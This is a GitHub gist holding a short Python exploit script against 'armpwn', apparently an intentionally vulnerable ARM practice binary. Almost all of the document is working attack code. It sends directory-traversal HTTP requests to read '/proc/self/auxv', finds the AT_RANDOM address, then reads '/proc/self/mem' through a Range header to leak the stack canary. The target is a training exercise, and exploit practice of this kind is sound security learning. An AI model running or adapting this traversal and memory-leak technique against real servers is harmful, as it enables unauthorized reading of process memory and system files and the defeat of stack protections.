-
-
Save hugsy/a462b398721bfb7e6bbd678b6d0e852b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# | |
# Leaking the canary value of the armpwn binary, thanks to Directory Traversal | |
# | |
# @_hugsy_ | |
# | |
# armpwn was created/maintained by @5aelo | |
# | |
from __future__ import print_function | |
import socket, struct | |
HOST, PORT = "rpi2-1", 80 | |
AT_RANDOM = 25 | |
s = socket.socket() | |
s.connect((HOST, PORT)) | |
print("[+] Connected") | |
print("[+] Leaking AUVX") | |
s.send("GET ../../../../../proc/self/auxv HTTP/1.0\r\n\r\n") | |
data = s.recv(1024) | |
i = data.find('\r\n'*2) | |
data = data[i+4:] | |
at_random_address = None | |
for i in range(0, len(data), 8): | |
code = struct.unpack("<I", data[i:i+4])[0] | |
if code==AT_RANDOM: | |
value = struct.unpack("<I", data[i+4:i+8])[0] | |
at_random_address = value | |
break | |
if at_random_address is None: | |
print("[-] not found") | |
exit(1) | |
print("[+] AT_RANDOM={:#x}".format(at_random_address)) | |
print("[+] Forging HTTP request using Range") | |
m = "GET ../../../../../proc/self/mem HTTP/1.0\r\n" | |
m+= "Range: bytes={:d}-{:d}\r\n\r\n".format(at_random_address,at_random_address+16) | |
s.send(m) | |
data = s.recv(1024) | |
i = data.find('\r\n'*2) | |
data = data[i+4:] | |
canary = struct.unpack("<I", data[:4])[0] | |
canary &= 0xffffff00 | |
print("[+] Canary is {:#x}".format(canary)) | |
s.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment